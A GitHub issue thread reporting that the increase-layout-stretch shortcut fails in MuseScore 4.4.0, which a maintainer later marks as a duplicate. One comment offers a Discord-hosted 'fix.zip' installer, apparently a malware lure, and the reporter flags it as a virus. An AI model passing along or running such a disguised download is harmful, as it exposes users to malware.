### ISSUE TITLE
Shortcut to increase layout stretch does not work

### ISSUE THREAD

**Issue by rainermarwan** [musescore/MuseScore#24398]
### Issue type

UX/Interaction bug (incorrect behaviour)

### Description with steps to reproduce

Use some score and try to format the page. (See example1)
Using shortcuts for stretching+ and stretching-.
Decrease layout stretch works as expected and (See example2).
Increase layout stretch does not work (nothing happens). 
Using stretch from Menubar works as expected (increase and decrease). 
This is not a practicable circumvention because this actions have to be done several times consecutive.
The shortcuts are correct defined with "{" for increase and "}" for decrease.

### Supporting files, videos and screenshots

<img width="772" alt="Example1" src="https://github.com/user-attachments/assets/ca4b0198-6053-4f7a-8410-3df6d1d61f73">
<img width="777" alt="Example2" src="https://github.com/user-attachments/assets/4c87a5b4-1985-4f88-b411-6f21393d5604">

### What is the latest version of MuseScore Studio where this issue is present?

OS: Windows 11 Version 2009 or later, Arch.: x86_64, MuseScore Studio version (64-bit): 4.4.0-242390800, revision: github-musescore-musescore-0fcd11b

### Regression

Yes, this used to work in a previous version of MuseScore 4.x

### Operating system

windows 11

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by rainermarwan** [comment]
This fix will be reported as virus or malware!!

**Comment by Jojo-Schmitz** [comment]
Is this related to my #24358 ?

**Comment by rainermarwan** [comment]
this seems to be exactly the same problem

**Comment by Jojo-Schmitz** [comment]
So it is a duplicate
